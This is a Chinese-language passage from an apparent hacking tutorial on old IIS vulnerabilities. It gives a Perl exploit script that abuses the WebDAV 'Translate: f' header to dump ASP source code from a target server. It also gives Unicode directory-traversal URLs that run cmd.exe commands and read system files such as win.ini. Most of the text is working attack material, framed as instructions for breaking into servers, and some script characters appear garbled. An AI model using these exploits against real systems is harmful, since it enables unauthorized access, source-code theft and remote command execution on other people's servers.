　　这个漏洞发布于2000年8月15号(www.securityfocus.com/bid/1578)，其问题是存在OFFICE 2000和FRONTPAGE 2000Server Extensions中的WebDAV中，当有人请求一个ASP/ASA后者其他任意脚本的时候在HTTP GET加上Translate:f后缀，并在请求文件后面加/就会显示文件代码，当然在没有打WIN2K SP1补丁为前提。这个是W2K的漏洞，但由于FP2000也安装在IIS4.0上，因此在IIS4.0上也有这个漏洞，你可而已使用下面的脚本来利用这个漏洞：

#############################

use IO::Socket; #

my ($port, $sock,$server); #

$size=0; #

#############################

#

$server="$ARGV[0]";

$s="$server";

$port="80";

$cm="$ARGV[1]";

&connect;

sub connect {

if ($#ARGV 《 1) {

howto();

exit;

}

$ver="GET /$cm%5C HTTP/1.0

Host: $server

Accept: */*

Translate: f

\n\n";

my($iaddr,$paddr,$proto);

$iaddr = inet_aton($server) || die "Error: $!";

$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";

$proto = getprotobyname('tcp') || die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error:

$!";

connect(SOCK, $paddr) || die "Error: $!";

send(SOCK, $ver, 0) || die "Can't to send packet: $!";

open(OUT, "》$server.txt");

print "Dumping $cm to $server.txt \n";

while(《SOCK》) {

print OUT 《SOCK》;

}

sub howto {

print "type as follows: Trans.pl www.目标机.com codetoview.asp \n\n";

}

close OUT;

$n=0;

$type=2;

close(SOCK);

exit(1);

}

　　你可以使用下面的方法来获得源代码：

Trasn.pl www.目标机.com default.asp

（13）、IIS存在的Unicode解析错误漏洞

　　NSFOCUS安全小组发现微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含unicode字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件。

　　你可以使用下面的方法利用这个漏洞：

(1) 如果系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能列出当前目录的内容：

http://www.目标机.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

(2) 利用这个漏洞查看系统文件内容也是可能的：

http://www.目标机.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

这个漏洞是针对中文操作平台，你也可以使用"%c0%af"或者"%c1%9c"来测试英文版本，原因就是编码不同。